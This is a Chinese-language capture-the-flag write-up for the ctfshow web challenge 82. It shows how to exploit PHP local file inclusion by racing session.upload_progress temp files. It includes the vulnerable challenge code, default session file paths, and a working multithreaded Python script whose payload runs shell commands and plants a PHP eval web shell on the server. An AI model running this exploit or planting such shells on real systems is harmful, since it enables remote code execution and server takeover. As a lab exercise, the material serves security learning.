前言
又一种新的文件包含利用方法,记录一下复现过程。
学习自:LFI 绕过 Session 包含限制 Getshell
利用session.upload_progress进行文件包含和反序列化渗透
kali本地复现漏洞
所有配置都为默认配置
大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该文件。
kali的html目录下写一个1.php
然后不停发包
可以看到目录下已经有了该临时文件,该临时文件因为默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,
一直cat,终于在没清空的时候cat到了,内容如下:
可以看到里面有我们上传的恶意代码,如果这时候我们用1.php包含这个临时文件,就可以执行里面的恶意代码了。
利用burp解题
例:ctfshow-web入门82
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了data和php,之前那些协议都用不了,尝试该方法。
利用session.upload_progress上传文件
这里cookie里PHPSESSID的值决定了我们上传临时文件名,payload可以如下设置
然后在尝试包含我们上传的文件,文件名默认为sess_再加上我们传的PHPSESSID值,比如我们这里为Cookie: PHPSESSID=ctf
所以文件名为sess_ctf
,默认路径有下面几个:
默认路径
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
这道题为/tmp/sess_ctf,不知道可以一个一个测试,再一直发包含/tmp/sess_ctf的包。
可以看到已经成功包含临时文件,并读取到了flag
利用python脚本解题
也直接用前面文章里的脚本:
import io
import sys
import requests
import threading
sessid = 'Qftm'
def POST(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
session.post(
'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/',
data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"},
files={"file":('q.txt', f)},
cookies={'PHPSESSID':sessid}
)
def READ(session):
while True:
response = session.get(f'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/?file=/tmp/sess_{sessid}')
if 'flag' not in response.text:
print('[+++]retry')
else:
print(response.text)
sys.exit(0)
with requests.session() as session:
t1 = threading.Thread(target=POST, args=(session, ))
t1.daemon = True
t1.start()
READ(session)
改下网址和要执行的shell即可